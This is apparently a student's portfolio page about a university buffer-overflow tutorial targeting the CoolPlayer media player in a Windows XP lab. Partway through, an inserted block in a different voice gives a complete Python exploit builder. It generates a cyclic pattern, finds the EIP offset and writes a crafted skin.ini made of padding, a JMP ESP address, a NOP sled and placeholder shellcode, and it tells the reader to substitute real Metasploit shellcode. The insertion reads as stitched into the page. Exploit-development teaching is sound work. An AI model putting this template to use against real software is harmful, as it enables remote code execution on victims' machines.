Patrick Collins
    Exploit Development


    About

    • Module: CMP320
    • Title: Advanced Ethical Hacking
    • Grade: A+
    • Overall Module Grade: A

    This was a really fun module. After learning how buffer overflow exploits work and how they are developed, I was tasked with writing a tutorial on buffer overflow exploitation aimed at someone who, like me beforehand, had no idea about them.

    Target Application

    CoolPlayer, a media player application, was the target used for the tutorial. It is reported to be vulnerable to a stack-based buffer overflow through its skin importing feature: when a crafted skin file containing an overly long value is opened, the overflow overwrites the saved return address and gives an attacker control of the application. The target was tested for exploitability both with DEP disabled and with DEP enabled in OptOut mode.


    Methodology

    Windows XP SP3 Virtual Machine
    The exploit development environment was a Windows XP SP3 (build 5.1.2600) virtual machine. Every exploit in the tutorial was developed and tested inside this VM.

    Debugging Application
    Two debuggers were used to investigate the application. OllyDbg v1.10 was used for most of the investigation and for the proof-of-concept (PoC) exploits. The more advanced sections, finding bad characters and generating ROP chains, used Immunity Debugger v1.85 so that mona.py could be run inside it.

    Generating Shellcode
    The shellcode embedded in the Perl scripts was generated with MSFGUI from Metasploit Framework v4.4.1-release, a very helpful and easy-to-use front end that was installed on the Windows XP SP3 VM.

    Pattern Creation
    The character patterns used in the scripts were created with executable builds of Metasploit's pattern tools, pattern_create.exe and pattern_offset.exe. pattern_create generates a cyclic pattern in which any four-byte window is unique; once the application has crashed with the pattern loaded, pattern_offset looks up the four bytes that landed in EIP and reports the exact distance from the start of the buffer to the overwritten return address.

    Catching Shells
    Shells from the advanced exploit section of the tutorial are caught with Netcat v1.10, running as a listener on the XP machine.

    Scripting
    Perl v5.10.1 is the scripting language used in the tutorial to generate the “.ini” skin file that is loaded into the target application. Findjmp.exe is used to locate a JMP ESP instruction in a “.dll” for the exploit script to return into. Mona.py, a Python plugin for Immunity Debugger, is used to find the application's bad characters and to generate the ROP chains that bypass DEP; it was placed in the “PyCommands” folder under the Immunity Debugger program files.
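The following is an added example, not the tutorial's own Perl script, showing the two tooling steps described in the pattern-creation and scripting sections above: generating a Metasploit-style cyclic pattern and computing the EIP offset from it, then building the malicious skin file as junk padding, a little-endian JMP ESP address, a NOP sled and shellcode. It is written in Python so it runs on any machine. Everything application-specific is an assumption: the ini section and key names, the JMP ESP address, the bad-character list and the INT3 stand-in shellcode are placeholders to be replaced with the values found with the debugger, findjmp and MSFGUI against the real target.

```python
"""
Added example (not the tutorial's Perl script): cyclic pattern creation,
EIP offset lookup, and construction of the crafted skin ".ini" file.

Application-specific values below are ASSUMPTIONS / placeholders.
"""
import string
import struct

# Assumed skin file layout; replace with the keys the target actually parses.
SKIN_HEADER = b"[CoolPlayer Skin]\r\n"
SKIN_KEY = b"PlaylistSkin="

# Assumed bad characters for a line-oriented text file: NUL terminates C
# strings, CR/LF end the ini line. Confirm with badchar_sequence() in the debugger.
BAD_CHARS = {0x00, 0x0A, 0x0D}

# Placeholder JMP ESP address (hypothetical); find the real one with findjmp or mona.
JMP_ESP = 0x7C86467B

# Stand-in "shellcode": INT3 breakpoints so the debugger stops when ESP is
# reached. Replace with MSFGUI/msfvenom output once EIP control is confirmed.
BREAKPOINT_SHELLCODE = b"\xCC" * 8


def pattern_create(length: int) -> bytes:
    """Metasploit cyclic pattern: Aa0Aa1...Aa9Ab0... (digit changes fastest)."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += f"{upper}{lower}{digit}".encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(pattern: bytes, eip: int) -> int:
    """Offset into the pattern of the 4 bytes that landed in EIP.

    The debugger shows EIP as a little-endian DWORD, so pack it back into the
    byte order it had in memory before searching. Returns -1 if not found.
    """
    needle = struct.pack("<I", eip)
    return pattern.find(needle)


def badchar_sequence(exclude=()) -> bytes:
    """\\x01..\\xff minus known bad bytes; send it and compare the stack dump."""
    return bytes(b for b in range(1, 256) if b not in exclude)


def check_bad_chars(payload: bytes, bad=frozenset(BAD_CHARS)) -> set:
    """Return the set of forbidden byte values present in the payload."""
    return {b for b in set(payload) if b in bad}


def build_payload(offset: int, jmp_esp: int, shellcode: bytes, nop_sled: int = 16) -> bytes:
    """junk | JMP ESP (little-endian) | NOP sled | shellcode.

    After the overwritten return address is popped, ESP points just past it,
    so JMP ESP lands in the NOP sled and slides into the shellcode.
    """
    return b"A" * offset + struct.pack("<I", jmp_esp) + b"\x90" * nop_sled + shellcode


def build_skin(payload: bytes) -> bytes:
    """Wrap the payload in the (assumed) skin ini structure."""
    return SKIN_HEADER + SKIN_KEY + payload + b"\r\n"


if __name__ == "__main__":
    # Step 1: load a pattern skin in the target under the debugger, read EIP,
    # then compute the offset. The EIP value here is a constructed example:
    # what a 300-byte pattern leaves in EIP when the overwrite is at byte 80.
    pattern = pattern_create(300)
    offset = pattern_offset(pattern, 0x37634136)
    print(f"EIP overwrite offset: {offset}")

    # Step 2: build the real skin file with the JMP ESP redirect.
    payload = build_payload(offset, JMP_ESP, BREAKPOINT_SHELLCODE)
    assert not check_bad_chars(payload), "payload contains bad characters"
    with open("skin.ini", "wb") as f:
        f.write(build_skin(payload))
    print(f"wrote skin.ini ({len(payload)} payload bytes)")
```

The offset step is run twice in practice: once with the pattern skin to learn the distance to EIP, then once more with the real payload to confirm that the four bytes at that offset are the ones that end up in EIP before any shellcode is added.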

    White Paper

    My finished white paper for the Advanced Ethical Hacking assignment can be read below.

    Please DO NOT plagiarise my white paper. You will be caught, it's not worth it.

    Copyright © 2022-2025 Patrick Collins